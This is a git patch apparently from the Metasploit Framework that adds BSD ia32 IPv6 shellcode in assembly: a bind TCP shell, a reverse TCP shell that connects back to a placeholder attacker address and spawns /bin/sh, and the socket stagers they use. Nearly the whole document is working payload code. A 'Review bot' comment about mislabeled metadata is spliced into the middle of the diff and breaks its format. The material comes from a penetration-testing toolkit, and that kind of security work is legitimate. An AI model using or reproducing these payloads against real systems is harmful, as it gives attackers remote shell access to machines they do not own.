From 7630ef17e33ae5888889a8615998a3e90ebc46a8 Mon Sep 17 00:00:00 2001
From: HD Moore
Date: Wed, 1 Feb 2012 00:34:31 -0600
Subject: [PATCH] Add BSD IPv6 payloads (source only for now)
---
 external/source/shellcode/bsd/ia32/Makefile | 4 +-
 .../bsd/ia32/single_bind_tcp_shell_ipv6.asm | 36 ++++++
 .../ia32/single_reverse_tcp_shell_ipv6.asm | 42 +++++++
 .../bsd/ia32/stager_sock_bind_ipv6.asm | 108 ++++++++++++++++++
 .../bsd/ia32/stager_sock_reverse_ipv6.asm | 95 +++++++++++++++
 5 files changed, 283 insertions(+), 2 deletions(-)
 create mode 100644 external/source/shellcode/bsd/ia32/single_bind_tcp_shell_ipv6.asm
 create mode 100644 external/source/shellcode/bsd/ia32/single_reverse_tcp_shell_ipv6.asm
 create mode 100644 external/source/shellcode/bsd/ia32/stager_sock_bind_ipv6.asm
 create mode 100644 external/source/shellcode/bsd/ia32/stager_sock_reverse_ipv6.asm
diff --git a/external/source/shellcode/bsd/ia32/Makefile b/external/source/shellcode/bsd/ia32/Makefile
index be00e42cd3..71c7e56332 100644
--- a/external/source/shellcode/bsd/ia32/Makefile
+++ b/external/source/shellcode/bsd/ia32/Makefile
@@ -1,7 +1,7 @@
 ASM=nasm
-STAGERS=stager_sock_bind stager_sock_find stager_sock_reverse
+STAGERS=stager_sock_bind stager_sock_bind_ipv6 stager_sock_find stager_sock_reverse stager_sock_reverse_ipv6
 STAGES=stage_tcp_shell
-SINGLE=single_bind_tcp_shell single_exec single_find_tcp_shell single_reverse_libinject single_reverse_tcp_shell single_findsock
+SINGLE=single_bind_tcp_shell single_exec single_find_tcp_shell single_reverse_libinject single_reverse_tcp_shell single_findsock single_reverse_tcp_shell_ipv6 single_bind_tcp_shell_ipv6
 OBJS=${STAGERS} ${STAGES} ${SINGLE}
 include ../../Makefile.incl
diff --git a/external/source/shellcode/bsd/ia32/single_bind_tcp_shell_ipv6.asm b/external/source/shellcode/bsd/ia32/single_bind_tcp_shell_ipv6.asm
new file mode 100644
index 0000000000..484d240008
--- /dev/null
+++ b/external/source/shellcode/bsd/ia32/single_bind_tcp_shell_ipv6.asm
@@ -0,0 +1,36 @@
+;;
+;
+; Name: single_bind_tcp_shell
+; Version: $Revision: 1628 $
+; License:
+;
+; This file is part of the Metasploit Exploit Framework
+; and is subject to the same licenses and copyrights as
+; the rest of this package.
+;
+; Description:
+;
+; Single portbind TCP shell.
+;
+; Meta-Information:
+;
+; meta-shortname=BSD Bind TCP Shell
+; meta-description=Listen on a port and spawn a shell
+; meta-authors=skape
+; meta-os=bsd
+; meta-arch=ia32
+; meta-category=single
+; meta-connection-type=bind
+; meta-name=bind_tcp_shell
+; meta-basemod=Msf::PayloadComponent::BindConnection
+; meta-offset-lport=0x8
+;;
+BITS 32
+
+%define USE_SINGLE_STAGE 1
+
+%include "generic.asm"
+%include "stager_sock_bind_ipv6.asm"
+
+shell:
+ execve_binsh EXECUTE_REDIRECT_IO
diff --git a/external/source/shellcode/bsd/ia32/single_reverse_tcp_shell_ipv6.asm b/external/source/shellcode/bsd/ia32/single_reverse_tcp_shell_ipv6.asm
new file mode 100644
index 0000000000..5b1d635428
--- /dev/null
+++ b/external/source/shellcode/bsd/ia32/single_reverse_tcp_shell_ipv6.asm
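Review bot: The header of single_bind_tcp_shell_ipv6.asm still carries the IPv4 file's identity — `; Name: single_bind_tcp_shell`, `; meta-shortname=BSD Bind TCP Shell` and `; meta-name=bind_tcp_shell` — although the file is the IPv6 single and includes stager_sock_bind_ipv6.asm; the lines should read `; Name: single_bind_tcp_shell_ipv6`, `; meta-shortname=BSD Bind TCP Shell (IPv6)` and `; meta-name=bind_tcp_shell_ipv6` so the header does not describe a different payload. The same copy-over applies to single_reverse_tcp_shell_ipv6.asm in the next hunk (`; Name: single_reverse_tcp_shell`, `; meta-name=reverse_tcp_shell`), and in the two stager hunks only `meta-shortname` (`BSD Bind TCP Stager`, `BSD Reverse TCP Stager`) lacks the IPv6 qualifier that their `meta-name` and Description already carry. Whether any tooling consumes these meta-* fields is not visible in this patch, so this is raised as a documentation consistency fix only.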
@@ -0,0 +1,42 @@
+;;
+;
+; Name: single_reverse_tcp_shell
+; Version: $Revision: 1626 $
+; License:
+;
+; This file is part of the Metasploit Exploit Framework
+; and is subject to the same licenses and copyrights as
+; the rest of this package.
+;
+; Description:
+;
+; Single reverse TCP shell.
+;
+; Meta-Information:
+;
+; meta-shortname=BSD Reverse TCP Shell
+; meta-description=Connect back to the attacker and spawn a shell
+; meta-authors=skape
+; meta-os=bsd
+; meta-arch=ia32
+; meta-category=single
+; meta-connection-type=reverse
+; meta-name=reverse_tcp_shell
+; meta-basemod=Msf::PayloadComponent::ReverseConnection
+; meta-offset-lhost=0x0a
+; meta-offset-lport=0x13
+;;
+BITS 32
+
+%define USE_SINGLE_STAGE 1
+%define ASSUME_REG_EAX 0
+
+; If you're on FreeBSD you can assume the state of edx to be 2, but NetBSD
+; clears edx.
+; %define ASSUME_REG_EDX 2
+
+%include "stager_sock_reverse_ipv6.asm"
+%include "generic.asm"
+
+shell:
+ execve_binsh EXECUTE_REDIRECT_IO
diff --git a/external/source/shellcode/bsd/ia32/stager_sock_bind_ipv6.asm b/external/source/shellcode/bsd/ia32/stager_sock_bind_ipv6.asm
new file mode 100644
index 0000000000..196328405e
--- /dev/null
+++ b/external/source/shellcode/bsd/ia32/stager_sock_bind_ipv6.asm
@@ -0,0 +1,108 @@
+;;
+;
+; Name: stager_sock_bind_ipv6
+; Qualities: Can Have Nulls
+; Version: $Revision: 1628 $
+; License:
+;
+; This file is part of the Metasploit Exploit Framework
+; and is subject to the same licenses and copyrights as
+; the rest of this package.
+;
+; Description:
+;
+; Implementation of a BSD portbind over IPv6 TCP stager.
+;
+; Meta-Information:
+;
+; meta-shortname=BSD Bind TCP Stager
+; meta-description=Listen on a port for a connection and run a second stage
+; meta-authors=skape , vlad902 , hdm
+; meta-os=bsd
+; meta-arch=ia32
+; meta-category=stager
+; meta-connection-type=bind
+; meta-name=bind_tcp_ipv6
+; meta-basemod=Msf::PayloadComponent::BindConnection
+; meta-offset-lport=26
+;;
+BITS 32
+GLOBAL main
+
+main:
+
+socket:
+ xor eax, eax
+ push eax ; Protocol: (IP=0)
+ inc eax
+ push eax ; Type: (SOCK_STREAM=1)
+ push byte 28 ; Domain: (PF_INET6=28)
+ push byte 97
+ pop eax ; socket()
+ push eax ; padding
+ int 0x80
+ mov ebx, eax ; save socket
+
+ xor edx, edx
+
+ push edx ; uint32_t sin6_scope_id; /* scope zone index */
+ push edx ; struct in6_addr sin6_addr; /* IP6 address */
+ push edx
+ push edx
+ push edx
+ push edx ; uint32_t sin6_flowinfo; /* IP6 flow information */
+ push dword 0xbfbf1c1c
+ ; in_port_t sin6_port; /* Transport layer port # */
+ ; uint8_t sin6_len; /* length of this struct */
+ ; sa_family_t sin6_family; /* AF_INET6 */
+
+ mov ecx, esp
+
+bind:
+ push byte 28
+ push ecx
+ push eax
+ push byte 104
+ pop eax
+ push eax ; padding
+ int 0x80
+
+listen:
+ mov al, 106
+ int 0x80
+
+accept:
+ push edx
+ push ebx
+%ifndef USE_SINGLE_STAGE
+ mov dh, 0x10
+%endif
+ push edx
+ mov al, 30
+ int 0x80
+
+%ifndef USE_SINGLE_STAGE
+
+read:
+ push ecx
+ push eax
+ push ecx
+%ifdef FD_REG_EBX
+ xchg eax, ebx
+%else
+ xchg eax, edi
+%endif
+ push byte 0x3
+ pop eax
+ int 0x80
+ ret
+
+%else
+
+%ifdef FD_REG_EBX
+ xchg eax, ebx
+%else
+ xchg eax, edi
+%endif
+
+%endif
diff --git a/external/source/shellcode/bsd/ia32/stager_sock_reverse_ipv6.asm b/external/source/shellcode/bsd/ia32/stager_sock_reverse_ipv6.asm
new file mode 100644
index 0000000000..8a181d4b65
--- /dev/null
+++ b/external/source/shellcode/bsd/ia32/stager_sock_reverse_ipv6.asm
@@ -0,0 +1,95 @@
+;;
+;
+; Name: stager_sock_reverse_ipv6
+; Qualities: Can Have Nulls
+; Version: $Revision: 1626 $
+; License:
+;
+; This file is part of the Metasploit Exploit Framework
+; and is subject to the same licenses and copyrights as
+; the rest of this package.
+;
+; Description:
+;
+; Implementation of a BSD reverse TCP stager over IPv6
+;
+; File descriptor in edi.
+;
+; Meta-Information:
+;
+; meta-shortname=BSD Reverse TCP Stager
+; meta-description=Connect back to the framework and run a second stage
+; meta-authors=skape , vlad902 , hdm
+; meta-os=bsd
+; meta-arch=ia32
+; meta-category=stager
+; meta-connection-type=reverse
+; meta-name=reverse_tcp_ipv6
+; meta-basemod=Msf::PayloadComponent::ReverseConnection
+; meta-offset-lhost=43
+; meta-offset-lport=36
+; meta-offset-scope=59
+;;
+BITS 32
+GLOBAL main
+
+main:
+
+socket:
+
+ xor eax, eax
+ push eax ; Protocol: (IP=0)
+ inc eax
+ push eax ; Type: (SOCK_STREAM=1)
+ push byte 28 ; Domain: (PF_INET6=28)
+
+ push byte 97
+ pop eax ; socket()
+ push eax ; padding
+ int 0x80
+ jmp short bounce_to_connect
+
+connect:
+ pop ecx
+ push byte 28
+ push ecx
+ push eax
+
+%ifdef FD_REG_EBX
+ xchg eax, ebx
+%else
+ xchg eax, edi
+%endif
+
+ push byte 98
+ pop eax
+ push eax ; padding
+ int 0x80
+
+ jmp short skip_bounce
+
+bounce_to_connect:
+ call connect
+
+ipv6_address:
+ db 28 ; uint8_t sin6_len; /* length of this struct */
+ db 28 ; sa_family_t sin6_family; /* AF_INET6 */
+ dw 0xbfbf ; in_port_t sin6_port; /* Transport layer port # */
+ dd 0 ; uint32_t sin6_flowinfo; /* IP6 flow information */
+ dd 0x43424140 ; struct in6_addr sin6_addr; /* IP6 address */
+ dd 0x48474645
+ dd 0x4d4b4a49
+ dd 0x51504f4e
+ dd 0 ; uint32_t sin6_scope_id; /* scope zone index */
+
+skip_bounce:
+
+%ifndef USE_SINGLE_STAGE
+
+read:
+ mov al, 0x3
+ mov byte [ecx - 0x3], 0x10
+ int 0x80
+ ret
+
+%endif